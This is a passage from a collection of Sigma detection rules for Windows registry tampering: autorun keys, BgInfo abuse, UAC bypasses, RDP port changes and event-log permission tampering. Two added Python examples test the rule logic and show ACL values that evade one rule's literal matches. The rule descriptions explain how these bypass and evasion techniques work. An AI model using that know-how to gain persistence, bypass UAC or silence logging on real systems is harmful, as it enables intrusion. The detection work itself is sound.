    "content": "title: Wow6432Node Classes Autorun Keys Modification\nid: 18f2065c-d36c-464a-a748-bcf909acb2e3\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    wow_classes_base:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Classes'\n    wow_classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\ShellEx\\ColumnHandlers'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    filter:\n        Details: '(Empty)'\n    condition: wow_classes_base and wow_classes and not filter\nfalsepositives:\n    - Legitimate software automatically 
(mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml",
    "content": "title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification\nid: 480421f9-417f-4d3b-9552-fd2728443ec8\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_wow_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion'\n    selection_wow_nt_current_version:\n        TargetObject|contains:\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options'\n            - '\\Drivers32'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_file_exec_options:\n        Details|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
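The three Wow6432Node rules above rely on a small set of Sigma string modifiers (contains, startswith, endswith, the |all flag, a null value) and the condition `all of selection_* and not 1 of filter_main_*`. As an added example that is not part of the Sigma repository, the Python below implements just that subset and runs the "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" rule over constructed Sysmon Event ID 13 (registry_set) records, showing which records the filters suppress and that Sigma string matching is case-insensitive. The event records and the evil.dll / evil.exe paths are constructed for illustration.

```python
"""Mini evaluator for the Sigma string modifiers used by the rule above
("Wow6432Node Windows NT CurrentVersion Autorun Keys Modification"), run over
constructed Sysmon Event ID 13 (registry_set) records.
Added example, not part of the Sigma repository. The event records and the
evil.dll / evil.exe paths below are constructed for illustration."""

# The rule's detection block transcribed into Python (selection names as in the YAML).
RULE = {
    "selection_wow_nt_current_version_base": {
        "TargetObject|contains": r"\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion",
    },
    "selection_wow_nt_current_version": {
        "TargetObject|contains": [r"\Windows\Appinit_Dlls", r"\Image File Execution Options", r"\Drivers32"],
    },
    "filter_main_empty": {"Details": "(Empty)"},
    "filter_main_null": {"Details": None},
    "filter_main_file_exec_options": {
        "Details|endswith": r"\Microsoft\Windows NT\CurrentVersion\Image File Execution Options",
    },
}


def _match_one(value, modifier, pattern):
    """One field value against one pattern. Sigma string matching is
    case-insensitive; a YAML null pattern matches only a missing field.
    Unknown modifiers raise KeyError (only the four used above are implemented)."""
    if pattern is None:
        return value is None
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    return {"contains": p in v, "startswith": v.startswith(p),
            "endswith": v.endswith(p), "": v == p}[modifier]


def _field_matches(event, key, pattern):
    """Key is 'Field', 'Field|mod' or 'Field|mod|all'; list patterns are OR-ed unless |all."""
    field, _, mods = key.partition("|")
    mods = [m for m in mods.split("|") if m]
    use_all = "all" in mods
    mods = [m for m in mods if m != "all"]
    modifier = mods[0] if mods else ""
    patterns = pattern if isinstance(pattern, list) else [pattern]
    hits = [_match_one(event.get(field), modifier, p) for p in patterns]
    return all(hits) if use_all else any(hits)


def selection_matches(event, selection):
    """Every key of a selection map must match (AND)."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(event, rule=RULE):
    """condition: all of selection_* and not 1 of filter_main_*"""
    selections = [v for k, v in rule.items() if k.startswith("selection_")]
    filters = [v for k, v in rule.items() if k.startswith("filter_main_")]
    return all(selection_matches(event, s) for s in selections) and not any(
        selection_matches(event, f) for f in filters
    )


# Constructed Sysmon Event ID 13 records (only the fields the rule reads).
WOW_NT = r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion"
SAMPLE_EVENTS = {
    # 32-bit AppInit_DLLs pointed at a DLL in a world-writable folder: alert.
    "appinit_dll": {"TargetObject": WOW_NT + r"\Windows\Appinit_Dlls",
                    "Details": r"C:\Users\Public\evil.dll"},
    # IFEO Debugger hijack of a 32-bit binary: alert.
    "ifeo_debugger": {"TargetObject": WOW_NT + r"\Image File Execution Options\notepad.exe\Debugger",
                      "Details": r"C:\Users\Public\evil.exe"},
    # Same key in a different case: still an alert, matching is case-insensitive.
    "uppercase_path": {"TargetObject": WOW_NT.upper() + r"\DRIVERS32\MSACM.EVIL",
                       "Details": r"C:\Users\Public\evil.dll"},
    # Value written with empty data: suppressed by filter_main_empty.
    "empty_details": {"TargetObject": WOW_NT + r"\Windows\Appinit_Dlls", "Details": "(Empty)"},
    # Key created without data (no Details field at all): suppressed by filter_main_null.
    "no_details": {"TargetObject": WOW_NT + r"\Drivers32"},
    # Native 64-bit Drivers32 key: outside this rule's Wow6432Node scope (sibling rules cover it).
    "native_path": {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32",
                    "Details": r"C:\Users\Public\evil.dll"},
}


def run_samples(events=SAMPLE_EVENTS, rule=RULE):
    """Evaluate every sample record; returns {name: alerted}."""
    return {name: rule_matches(ev, rule) for name, ev in events.items()}
```

Sigma backends normally compile a rule into the target SIEM's query language; evaluating the detection block directly like this is a quick way to check that the filter_main_* exclusions suppress exactly the benign shapes you expect before the rule is deployed.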
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml",
    "content": "title: New BgInfo.EXE Custom DB Path Registry Configuration\nid: 53330955-dc52-487f-a3a2-da24dcff99b5\nstatus: test\ndescription: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Winternals\\BGInfo\\Database'\n    condition: selection\nfalsepositives:\n    - Legitimate use of external DB to save the results\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml",
    "content": "title: New BgInfo.EXE Custom VBScript Registry Configuration\nid: 992dd79f-dde8-4bb0-9085-6350ba97cfb3\nrelated:\n    - id: cd277474-5c52-4423-a52b-ac2d7969902f\n      type: similar\nstatus: test\ndescription: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Winternals\\BGInfo\\UserFields\\'\n        Details|startswith: '4' # VBScript field type (the WMI query type is 6, see the related rule)\n    condition: selection\nfalsepositives:\n    - Legitimate VBScript\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml",
    "content": "title: New BgInfo.EXE Custom WMI Query Registry Configuration\nid: cd277474-5c52-4423-a52b-ac2d7969902f\nrelated:\n    - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3\n      type: similar\nstatus: test\ndescription: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via \"BgInfo.exe\"\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Winternals\\BGInfo\\UserFields\\'\n        Details|startswith: '6' # WMI\n    condition: selection\nfalsepositives:\n    - Legitimate WMI query\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml",
    "content": "title: Bypass UAC Using DelegateExecute\nid: 46dd5308-4572-4d12-aa43-8938f0184d4f\nstatus: test\ndescription: |\n    Detects the creation of an empty \"DelegateExecute\" value under a shell \"open\\command\" key.\n    When this value is present, an auto-elevated binary such as sdclt.exe executes the command stored in the key's \"(Default)\" value, which yields a fileless User Account Control bypass.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\n    - https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\open\\command\\DelegateExecute'\n        Details: (Empty)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using sdclt DelegateExecute\n      technique: T1548.002\n      atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml",
    "content": "title: Bypass UAC Using Event Viewer\nid: 674202d0-b22a-4af4-ae5f-2eda1f3da1af\nstatus: test\ndescription: Detects modification of the \"mscfile\\shell\\open\\command\" handler in the current user's registry classes, which the auto-elevated Event Viewer (eventvwr.exe) executes, resulting in a fileless User Account Control bypass\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '_Classes\\mscfile\\shell\\open\\command\\(Default)'\n    filter:\n        Details|startswith: '%SystemRoot%\\system32\\mmc.exe \"%1\" %'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using Event Viewer (cmd)\n      technique: T1548.002\n      atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml",
    "content": "title: Bypass UAC Using SilentCleanup Task\nid: 724ea201-6514-4f38-9739-e5973c34f49a\nstatus: test\ndescription: |\n    Detects the setting of the environment variable \"windir\" to a non default value.\n    Attackers abuse this variable to trigger a UAC bypass via the \"SilentCleanup\" scheduled task.\n    SilentCleanup is an auto-elevated task that runs %windir%\\system32\\cleanmgr.exe; because the path is expanded from the variable, pointing \"windir\" at an attacker-controlled location executes that file with administrator privileges without a UAC prompt.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task\n    - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\n    - https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign\nauthor: frack113, Nextron Systems\ndate: 2022-01-06\nmodified: 2024-01-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Environment\\windir'\n    filter_main_default:\n        Details: '%SystemRoot%'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using SilentCleanup Task\n      technique: T1548.002\n      atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_rdp_port.yml",
    "content": "title: Default RDP Port Changed to Non Standard Port\nid: 509e84b9-a71a-40e0-834f-05470369bd1e\nstatus: test\ndescription: |\n    Detects a change of the RDP listener port (PortNumber) away from the default 3389. Attackers move the port to keep RDP reachable while evading port-based detections and firewall rules.\n    Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.\n    Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md\nauthor: frack113\ndate: 2022-01-01\nmodified: 2024-03-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber'\n    filter_main_port:\n        Details: DWORD (0x00000d3d) # 3389\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Changing RDP Port to Non Standard Port via Powershell\n      technique: T1021.001\n      atomic_guid: 2f840dd4-8a2e-4f44-beb3-6b2399ea3771\n    - type: atomic-red-team\n      name: Changing RDP Port to Non Standard Port via Command_Prompt\n      technique: T1021.001\n      atomic_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_security_zones.yml",
    "content": "title: IE Change Domain Zone\nid: 45e112d0-7759-4c2a-aa36-9f8fb79d3393\nrelated:\n    - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3\n      type: derived\nstatus: test\ndescription: Detects the addition of a domain to an Internet Explorer / Windows security zone (for example Trusted Sites) via the \"ZoneMap\\Domains\" registry key. Attackers use this to lower the security settings applied to content served from a domain they control.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_domains:\n        TargetObject|contains: \\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\\n    filter:\n        Details:\n            - DWORD (0x00000000) # My Computer\n            - DWORD (0x00000001) # Local Intranet Zone\n            - '(Empty)'\n            # 2 - Trusted Sites, 3 - Internet, 4 - Restricted Sites\n    condition: selection_domains and not filter\nfalsepositives:\n    - Administrative scripts\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Add Domain to Trusted Sites Zone\n      technique: T1112\n      atomic_guid: cf447677-5a4e-4937-a82c-e47d254afd57\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml",
    "content": "title: Sysmon Driver Altitude Change\nid: 4916a35e-bfc4-47d0-8e25-a003d7067061\nstatus: test\ndescription: |\n    Detects changes in Sysmon driver altitude value.\n    If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.\nreferences:\n    - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650\n    - https://youtu.be/zSihR3lTf7g\nauthor: B.Talebi\ndate: 2022-07-28\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\'\n        TargetObject|endswith: '\\Instances\\Sysmon Instance\\Altitude'\n    condition: selection\nfalsepositives:\n    - Legitimate driver altitude change to hide sysmon\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml",
    "content": "title: Change Winevt Channel Access Permission Via Registry\nid: 7d9263bd-dc47-4a58-bc92-5474abab390c\nstatus: test\ndescription: |\n    Detects tampering with the \"ChannelAccess\" registry value of a Windows event channel in order to change who may read, write or clear it.\n    The access mask bits of a channel ACE are 0x1 Read, 0x2 Write and 0x4 Clear. An ACE that grants Local System (SY) only 0x1 leaves the Event Log service unable to write new events to that channel.\nreferences:\n    - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/\n    - https://learn.microsoft.com/en-us/windows/win32/api/winevt/\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: frack113\ndate: 2022-09-17\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\'\n        TargetObject|endswith: '\\ChannelAccess'\n        # Add more interesting combinations if you find them\n        Details|contains:\n            - '(A;;0x1;;;LA)' # Local Administrator account limited to Read (0x1)\n            - '(A;;0x1;;;SY)' # Local System limited to Read (0x1), the Event Log service can no longer write to the channel\n            - '(A;;0x5;;;BA)' # Built-in Administrators limited to Read + Clear (0x5), no Write\n    filter_main_trustedinstaller:\n        Image: 'C:\\Windows\\servicing\\TrustedInstaller.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
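The rule above matches three literal ACE strings in Details, so a ChannelAccess value that removes Write from Local System with a different mask (for example `(A;;0x5;;;SY)`, Read + Clear) or with an explicit deny ACE is not caught. As an added example that is not part of the Sigma repository, the Python below parses the A/D ACEs of a ChannelAccess SDDL string and evaluates the access-mask bits (0x1 Read, 0x2 Write, 0x4 Clear, as documented for event log channel security descriptors) next to the rule's literal check. Every SDDL string in it is constructed for illustration, not copied from a live system.

```python
"""Parse the A/D ACEs of a winevt ChannelAccess SDDL string and flag ACEs that
leave a principal without Write access to the channel, next to the literal
check the Sigma rule above performs.
Added example, not part of the Sigma repository; every SDDL string below is
constructed for illustration, not copied from a live system."""
import re

# Event log channel access mask bits.
READ, WRITE, CLEAR = 0x1, 0x2, 0x4

# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
# Only access-allowed (A) and access-denied (D) ACEs are considered; SACL audit
# ACEs (AU/AL) and conditional/resource ACE types do not match this pattern.
ACE_RE = re.compile(
    r"\((?P<type>[AD]);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)"
)

# The literal ACE strings the Sigma rule looks for in Details.
SIGMA_LITERALS = ("(A;;0x1;;;LA)", "(A;;0x1;;;SY)", "(A;;0x5;;;BA)")


def parse_dacl(sddl):
    """Return [(ace_type, rights, sid)] for the A/D ACEs in an SDDL string.
    Channel SDDLs express rights as hex; a symbolic rights token such as 'GA'
    is not understood here and raises rather than being silently dropped."""
    aces = []
    for m in ACE_RE.finditer(sddl):
        rights = m.group("rights")
        if not rights.lower().startswith("0x"):
            raise ValueError(f"unsupported rights token {rights!r} in {sddl!r}")
        aces.append((m.group("type"), int(rights, 16), m.group("sid")))
    return aces


def sigma_literal_match(details):
    """What the Sigma rule does: Details|contains any of three exact ACE strings."""
    return any(lit in details for lit in SIGMA_LITERALS)


def principals_without_write(sddl, principals=("SY",)):
    """ACEs for the given principals that allow access without WRITE, or that
    deny WRITE. If the Event Log service (Local System, SY) has no WRITE bit on
    a channel, new events for that channel are not recorded."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        if sid not in principals:
            continue
        if ace_type == "A" and not rights & WRITE:
            findings.append(f"{sid}: allow 0x{rights:x} lacks WRITE")
        elif ace_type == "D" and rights & WRITE:
            findings.append(f"{sid}: deny 0x{rights:x} removes WRITE")
    return findings


# Constructed ChannelAccess values (not defaults copied from a system).
BASELINE = "O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;S-1-5-32-573)"  # SY keeps Write
READONLY_SY = "O:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)"                           # hit by the rule's literals
DENY_SY = "O:BAG:SYD:(D;;0x2;;;SY)(A;;0xf0007;;;SY)(A;;0x7;;;BA)"              # deny ACE, no literal hit
READ_CLEAR_SY = "O:BAG:SYD:(A;;0x5;;;SY)(A;;0x7;;;BA)"                          # read+clear, no literal hit


def compare(sddl):
    """Return (sigma_literal_hit, bitmask_findings) for one ChannelAccess value."""
    return sigma_literal_match(sddl), principals_without_write(sddl)
```

The literal list in the rule is cheap and works in any SIEM; the bitmask check is what you would run in an enrichment step or a hunting notebook over the same Details field to cover the mask values the literals do not name.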
  {
    "path": "rules/windows/registry/registry_set/registry_set_chrome_extension.yml",
    "content": "title: Running Chrome VPN Extensions via the Registry 2 VPN Extension\nid: b64a026b-8deb-4c1d-92fd-98893209dff1\nstatus: test\ndescription: Running Chrome VPN Extensions via the Registry install 2 vpn extension\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension\nauthor: frack113\ndate: 2021-12-28\nmodified: 2023-08-17\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1133\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    chrome_ext:\n        TargetObject|contains: 'Software\\Wow6432Node\\Google\\Chrome\\Extensions'\n        TargetObject|endswith: 'update_url'\n    chrome_vpn:\n        TargetObject|contains:\n            - fdcgdnkidjaadafnichfpabhfomcebme # ZenMate VPN\n            - fcfhplploccackoneaefokcmbjfbkenj # 1clickVPN\n            - bihmplhobchoageeokmgbdihknkjbknd # Touch VPN\n            - gkojfkhlekighikafcpjkiklfbnlmeio # Hola Free VPN\n            - jajilbjjinjmgcibalaakngmkilboobh # Astar VPN\n            - gjknjjomckknofjidppipffbpoekiipm # VPN Free\n            - nabbmpekekjknlbkgpodfndbodhijjem # Earth VPN\n            - kpiecbcckbofpmkkkdibbllpinceiihk # DotVPN\n            - nlbejmccbhkncgokjcmghpfloaajcffj # Hotspot Shield Free VPN\n            - omghfjlpggmjjaagoclmmobgdodcjboh # Browsec VPN\n            - bibjcjfmgapbfoljiojpipaooddpkpai # VPN-free.pro\n            - mpcaainmfjjigeicjnlkdfajbioopjko # VPN Unlimited Free\n            - jljopmgdobloagejpohpldgkiellmfnc # PP VPN\n            - lochiccbgeohimldjooaakjllnafhaid # IP Unblock\n            - nhnfcgpcbfclhfafjlooihdfghaeinfc # Surf VPN\n            - ookhnhpkphagefgdiemllfajmkdkcaim # iNinja VPN\n            - namfblliamklmeodpcelkokjbffgmeoo # Daily VPN\n            - nbcojefnccbanplpoffopkoepjmhgdgh # Hoxx VPN Proxy\n            - 
majdfhpaihoncoakbjgbdhglocklcgno # Free VPN\n            - lnfdmdhmfbimhhpaeocncdlhiodoblbd # VPN PROXY MASTER\n            - eppiocemhmnlbhjplcgkofciiegomcon # Urban Free VPN\n            - cocfojppfigjeefejbpfmedgjbpchcng # SaferVPN Proxy\n            - foiopecknacmiihiocgdjgbjokkpkohc # VPN Professional\n            - hhdobjgopfphlmjbmnpglhfcgppchgje # AdGuard VPN\n            - jgbaghohigdbgbolncodkdlpenhcmcge # Free VPN\n            - inligpkjkhbpifecbdjhmdpcfhnlelja # Free One Touch VPN\n            - higioemojdadgdbhbbbkfbebbdlfjbip # Unlimited VPN & Proxy by ibVPN\n            - hipncndjamdcmphkgngojegjblibadbe # RusVPN\n            - iolonopooapdagdemdoaihahlfkncfgg # Azino VPN\n            - nhfjkakglbnnpkpldhjmpmmfefifedcj # Pron VPN\n            - jpgljfpmoofbmlieejglhonfofmahini # Free Residential VPN\n            - fgddmllnllkalaagkghckoinaemmogpe # ExpressVPN\n            - ejkaocphofnobjdedneohbbiilggdlbi # Hotspot Shield Elite VPN Proxy\n            - keodbianoliadkoelloecbhllnpiocoi # Hide My IP VPN\n            - hoapmlpnmpaehilehggglehfdlnoegck # Tunnello VPN\n            - poeojclicodamonabcabmapamjkkmnnk # HMA VPN Proxy Unblocker\n            - dfkdflfgjdajbhocmfjolpjbebdkcjog # Free Avira Phantom VPN\n            - kcdahmgmaagjhocpipbodaokikjkampi # Hola VPN\n            - klnkiajpmpkkkgpgbogmcgfjhdoljacg # Free VPN for Chrome\n            - lneaocagcijjdpkcabeanfpdbmapcjjg # Hub VPN\n            - pgfpignfckbloagkfnamnolkeaecfgfh # Free Proxy VPN\n            - jplnlifepflhkbkgonidnobkakhmpnmh # Private Internet Access\n            - jliodmnojccaloajphkingdnpljdhdok # Turbo VPN for PC\n            - hnmpcagpplmpfojmgmnngilcnanddlhb # Windscribe\n            - ffbkglfijbcbgblgflchnbphjdllaogb # CyberGhost VPN\n            - kcndmbbelllkmioekdagahekgimemejo # VPN.AC\n            - jdgilggpfmjpbodmhndmhojklgfdlhob # Browser VPN\n            - bihhflimonbpcfagfadcnbbdngpopnjb # DEEPRISM VPN\n            - ppajinakbfocjfnijggfndbdmjggcmde # My 
